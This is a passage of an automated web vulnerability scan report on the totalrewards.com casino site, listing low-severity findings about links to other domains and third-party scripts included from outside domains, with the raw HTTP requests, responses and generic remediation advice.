Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:17 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000Z2_bCb2BUTDfMR2yc1tsC3Q:14tlevj56;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
</a>    <a class="gnLink" href="http://investor.harrahs.com">INVESTOR RELATIONS</a>
...[SNIP]...
</a> | <a href="https://www.harrahs.com/TotalRewards/RewardsAndBenefits.do?page=overview">Total Rewards</a> | <a href="http://www.worldseriesofpoker.com" target="_blank">World Series of Poker</a>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

5.2. http://www.totalrewards.com/PackageSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /PackageSearch.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /PackageSearch.do?showAll=Y&marketCode=LVM HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000x_BmiyC-8n2Ogem00kO3Ic9:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<br />
           &bull; <a id="totalexperiences"href="http://www.totalexperiences.com/totalexperiences?campaign=TEhcomLVM" target="_blank"> GROUP GETAWAYS</a><br />
&bull; <a id="weddings"href="http://www.harrahs.com/weddings/las-vegas/index.html"> Weddings</a><br />
&bull;<a href="https://digital.virtualmarketingpartners.com/vmp/Harrahs-Entertainment/consumer-brochure/#/0" target="_blank" id="digital-brochure" ><em>
...[SNIP]...
<br />
&bull;<a href="https://digital.virtualmarketingpartners.com/vmp/Harrahs-Entertainment/consumer-brochure/#/0" target="_blank" id="digital-brochure" ><em>
...[SNIP]...
<p><a href="http://www.harrahs.com/MakeReservation.do?propCode=CLV&packageCode=ICCDM">View 2nd Mezzanine Ticket & Room Package >
...[SNIP]...
<p><a href="http://www.harrahs.com/MakeReservation.do?propCode=CLV&packageCode=ICCDO">View Rear Orchestra Ticket & Room Package >
...[SNIP]...
<p><a href="http://www.harrahs.com/MakeReservation.do?propCode=FLV&packageCode=IFSTR">OR stay in a deluxe room from $55/night!</a>
...[SNIP]...
<p><a href="http://www.harrahs.com/MakeReservation.do?propCode=FLV&packageCode=IFGOR">Upgrade to a GO Room from $75/night!</a>
...[SNIP]...
</a>    <a class="gnLink" href="http://investor.harrahs.com">INVESTOR RELATIONS</a>
...[SNIP]...
</a> | <a href="https://www.harrahs.com/TotalRewards/RewardsAndBenefits.do?page=overview">Total Rewards</a> | <a href="http://www.worldseriesofpoker.com" target="_blank">World Series of Poker</a>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

5.3. http://www.totalrewards.com/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /index.shtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.shtml? HTTP/1.1
Host: www.totalrewards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; mercury=Y

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:44:28 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<li><a href="http://www.flamingolasvegas.com">Flamingo</a>
...[SNIP]...
<li><a href="http://www.grandcasinobiloxi.com">Grand</a>
...[SNIP]...
<li><a href="http://www.harveystahoe.com">Harvey's</a>
...[SNIP]...
<li><a href="http://www.imperialpalace.com">Imperial Palace</a>
...[SNIP]...
<li><a href="http://www.parislasvegas.com">Paris</a>
...[SNIP]...
<li><a href="http://www.planethollywoodresort.com">Planet Hollywood</a>
...[SNIP]...
<li><a href="http://www.riolasvegas.com">Rio</a>
...[SNIP]...
<li><a href="http://www.showboatac.com">Showboat</a>
...[SNIP]...
<li><a href="http://www.tunica-roadhouse.com">Tunica Roadhouse</a>
...[SNIP]...
<li><a href="http://www.wildwildwestac.com">Wild Wild West</a>
...[SNIP]...
<li><a href="http://www.ballysac.com">Bally's Atlantic City</a>
...[SNIP]...
<li><a href="http://www.ballyslv.com">Bally's Las Vegas</a>
...[SNIP]...
<li><a href="http://www.billslasvegas.com">Bill's Gamblin' Hall Las Vegas</a>
...[SNIP]...
<li><a href="http://www.caesarsac.com">Caesars Atlantic City</a>
...[SNIP]...
<li><a href="http://www.caesarspalace.com">Caesars Palace (Las Vegas)</a>
...[SNIP]...
<li><a href="http://www.caesarswindsor.com">Caesars Windsor</a>
...[SNIP]...
<li><a href="http://www.flamingolasvegas.com">Flamingo Las Vegas</a>
...[SNIP]...
<li><a href="http://www.grandcasinobiloxi.com">Grand Biloxi</a>
...[SNIP]...
<li><a href="http://www.harrahsresort.com">Harrah's Resort Atlantic City</a>
...[SNIP]...
<li><a href="http://www.harrahscherokee.com">Harrah's Cherokee</a>
...[SNIP]...
<li><a href="http://www.harrahschester.com">Harrah's Chester</a>
...[SNIP]...
<li><a href="http://www.harrahscouncilbluffs.com">Harrah's Council Bluffs</a>
...[SNIP]...
<li><a href="http://www.harrahsjoliet.com">Harrah's Joliet</a>
...[SNIP]...
<li><a href="http://www.harrahslaketahoe.com">Harrah's Lake Tahoe</a>
...[SNIP]...
<li><a href="http://www.harrahslasvegas.com">Harrah's Las Vegas</a>
...[SNIP]...
<li><a href="http://www.harrahslaughlin.com">Harrah's Laughlin</a>
...[SNIP]...
<li><a href="http://www.harrahslouisianadowns.com">Harrah's Louisiana Downs</a>
...[SNIP]...
<li><a href="http://www.harrahsmetropolis.com">Harrah's Metropolis</a>
...[SNIP]...
<li><a href="http://www.harrahsneworleans.com">Harrah's New Orleans</a>
...[SNIP]...
<li><a href="http://www.harrahsnkc.com">Harrah's North Kansas City</a>
...[SNIP]...
<li><a href="http://www.harrahsakchin.com">Harrah's Phoenix Ak-Chin</a>
...[SNIP]...
<li><a href="http://www.harrahsreno.com">Harrah's Reno</a>
...[SNIP]...
<li><a href="http://www.harrahsrincon.com">Harrah's Rincon-San Diego</a>
...[SNIP]...
<li><a href="http://www.harrahsstlouis.com">Harrah's St. Louis</a>
...[SNIP]...
<li><a href="http://www.harrahstunica.com">Harrah's Tunica</a>
...[SNIP]...
<li><a href="http://www.harveystahoe.com">Harveys Lake Tahoe</a>
...[SNIP]...
<li><a href="http://www.horseshoebossiercity.com">Horseshoe Bossier City</a>
...[SNIP]...
<li><a href="http://www.horseshoecouncilbluffs.com">Horseshoe Council Bluffs</a>
...[SNIP]...
<li><a href="http://www.horseshoehammond.com">Horseshoe Hammond</a>
...[SNIP]...
<li><a href="http://www.horseshoe-indiana.com">Horseshoe Southern Indiana</a>
...[SNIP]...
<li><a href="http://www.horseshoetunica.com">Horseshoe Tunica</a>
...[SNIP]...
<li><a href="http://www.imperialpalace.com">Imperial Palace Las Vegas</a>
...[SNIP]...
<li><a href="http://www.harrahs.com/osheas">O'Sheas Las Vegas</a>
...[SNIP]...
<li><a href="http://www.parislasvegas.com">Paris Las Vegas</a>
...[SNIP]...
<li><a href="http://www.planethollywoodresort.com">Planet Hollywood Las Vegas</a>
...[SNIP]...
<li><a href="http://www.riolasvegas.com">Rio Las Vegas</a>
...[SNIP]...
<li><a href="http://www.showboatac.com">Showboat Atlantic City</a>
...[SNIP]...
<li><a href="http://www.tunica-roadhouse.com">Tunica Roadhouse</a>
...[SNIP]...
<li><a href="http://www.wildwildwestac.com">Wild Wild West Atlantic City</a>
...[SNIP]...
<br />
<a href="https://www.adobe.com/go/getflashplayer"> <img src="/javascript_includes/swfobject/get_flash_player.gif" alt="Get Adobe Flash player" border="0" />
...[SNIP]...
<li>Follow Total Rewards on <a target="_FB" class="featuresLink" href="http://www.facebook.com/TotalRewards">Facebook</a> and <a target="_Tw" class="featuresLink" href="http://twitter.com/Total_Rewards">Twitter</a>
...[SNIP]...
<li><a class="featuresLink" href="http://app.harrahs-marketing.com/enroll/universal/signup.cfm?rd=hcom_emailsignup"> Sign up for Special Offers &amp; Exclusive Invitations</a>
...[SNIP]...
<li><a class="featuresLink" href="https://www.harrahs.com/e-totalrewards/giftcard/"> Get what you want with the Total Rewards Gift Card</a>
...[SNIP]...
</a>
   <a class="gnLink" href="http://investor.harrahs.com">INVESTOR RELATIONS</a>
...[SNIP]...
</a> | <a href="https://www.harrahs.com/TotalRewards/RewardsAndBenefits.do?page=overview">Total Rewards</a> | <a href="http://www.worldseriesofpoker.com" target="_blank">World Series of Poker</a>
...[SNIP]...
<noscript>
<iframe src="https://switch.atdmt.com/iaction/heihb8_1HETHomepage_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<!-- SITE WIDE TAG MOVED FROM GLOBAL LOGIN -->
<script language="JavaScript" src="https://view.atdmt.com/jaction/heihb9_HarrahsSiteWideRemessagingTag_10"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 28 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.totalrewards.com/%7B%7BimagePath%7D%7D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /%7B%7BimagePath%7D%7D

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /%7B%7BimagePath%7D%7D HTTP/1.1
Host: www.totalrewards.com
Proxy-Connection: keep-alive
Referer: http://www.totalrewards.com/index.shtml?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; mercury=Y

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 19 Mar 2011 13:44:31 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.2. http://www.totalrewards.com/CorporatePackageSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /CorporatePackageSearch.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CorporatePackageSearch.do HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000ZvDSD7k714PY8jVA4P9dKYK:14tlevj56;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.3. http://www.totalrewards.com/PackageSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /PackageSearch.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PackageSearch.do?showAll=Y&marketCode=LVM HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000x_BmiyC-8n2Ogem00kO3Ic9:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.4. http://www.totalrewards.com/best-rate-guarantee.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /best-rate-guarantee.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /best-rate-guarantee.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20332

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Caesars Entertainment - Best Rate Guarantee - Lowest Rates Guaranteed</t
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.5. http://www.totalrewards.com/brands/ballys/hotel-casinos/ballys-brand.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /brands/ballys/hotel-casinos/ballys-brand.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /brands/ballys/hotel-casinos/ballys-brand.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30363


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.6. http://www.totalrewards.com/brands/caesars/hotel-casinos/caesars-brand.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /brands/caesars/hotel-casinos/caesars-brand.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /brands/caesars/hotel-casinos/caesars-brand.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:10 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.7. http://www.totalrewards.com/brands/harrahs/hotel-casinos/harrahs-brand.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /brands/harrahs/hotel-casinos/harrahs-brand.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /brands/harrahs/hotel-casinos/harrahs-brand.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:12 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.8. http://www.totalrewards.com/brands/horseshoe/hotel-casinos/horseshoe-brand.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /brands/horseshoe/hotel-casinos/horseshoe-brand.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brands/horseshoe/hotel-casinos/horseshoe-brand.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:12 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Horseshoe - Hotels, Resorts and Casinos in Tunica, Hammond and more</tit
...[SNIP]...
<!-- START nyroModal SCRIPT -->
<script src="http://www.harrahs.com/javascript_includes/jQuery/1.3/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.harrahs.com/javascript_includes/jQuery/plugins/nyroModal/jquery.nyroModal-1.5.0.pack.js" type="text/javascript"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.9. http://www.totalrewards.com/casino-gambling/slots-finder/slot-finder-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casino-gambling/slots-finder/slot-finder-home.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /casino-gambling/slots-finder/slot-finder-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:18 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.10. http://www.totalrewards.com/casinos/wild-wild-west/hotel-casino/property-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/wild-wild-west/hotel-casino/property-home.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /casinos/wild-wild-west/hotel-casino/property-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:27 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37295

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Wild Wild West Casino</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
<div id="leftColumn">
       <script src="http://www.harrahs.com/javascript_includes/jQuery/1.3/jquery.min.js" type="text/javascript"></script>
       <script src="http://www.harrahs.com/javascript_includes/jQuery/ui/jquery-ui.min.js" type="text/javascript"></script>
       <script src="http://www.harrahs.com/include/leftNav/flvBookingMask/bookingMask.js" type="text/javascript"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.11. http://www.totalrewards.com/corporate/about-us-responsible-gaming.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /corporate/about-us-responsible-gaming.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /corporate/about-us-responsible-gaming.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:21 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29679


<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<link type="text/css" rel="style
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.12. http://www.totalrewards.com/corporate/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /corporate/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /corporate/index.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
